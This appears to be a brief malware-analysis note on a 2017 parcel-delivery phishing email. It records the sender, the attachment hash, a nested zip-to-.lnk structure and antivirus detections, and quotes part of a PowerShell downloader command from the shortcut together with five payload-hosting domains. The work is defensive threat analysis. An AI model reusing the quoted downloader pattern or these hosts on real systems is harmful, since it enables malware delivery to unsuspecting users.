Timestamps – end of January 2017 – 26/1/2017 12:06 PM
Email info
- Sender IP – 91.121.30.151
- Sender Email – [email protected]
- Subject – Parcel #8742826 shipment problem, please review
Attachment
- Hash – 45286606b6e84d39867bb89f3a769e2753248276a31d34b7623afdce481104cb
- Filename – Undelivered-Parcel-ID-874826.zip
- VirusTotal – https://www.virustotal.com/ro/file/45286606b6e84d39867bb89f3a769e2753248276a31d34b7623afdce481104cb/analysis/
Only TrendMicro relates it to something familiar “TROJ_NEMUZIP.SMA1” while all the others have generic namings for a Powershell script “TR/LNK.PSH.Downloader.Gen” .
Attachment comments
The attachment was made in a Matryoshka style.
Undelivered-Parcel-ID-874826.zip -> Undelivered-Parcel-ID-874826.doc.zip -> Undelivered-Parcel-ID-874826.doc (folder) -> Undelivered-Parcel-ID-874826.doc.lnk = shortcut to powershell
This makes sense for AV evasion, but when it comes to the user executing the end file – it doesn’t seem likely that the user will extract a double archive and then go into a folder to actually execute something. Or, they wouldn’t extract anything and just double click until they get to execute the file.
Powershell parameters found in the shortcut shortcut :
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -NoProfile -command $ld = 0; $cs = [char]92; $ll = ‘jb-sounddesign.de’,’www.sdo.ru’,’vitalmanage.com’,’www.poolcenterdessau.de’,’www.gifizsee.de’; $fn = $env:temp+$cs; $lk = $fn
Domains listed
- jb-sounddesign.de
- www.sdo.ru
- vitalmanage.com
- www.poolcenterdessau.de
- www.gifizsee.de
Post Execution observations to be added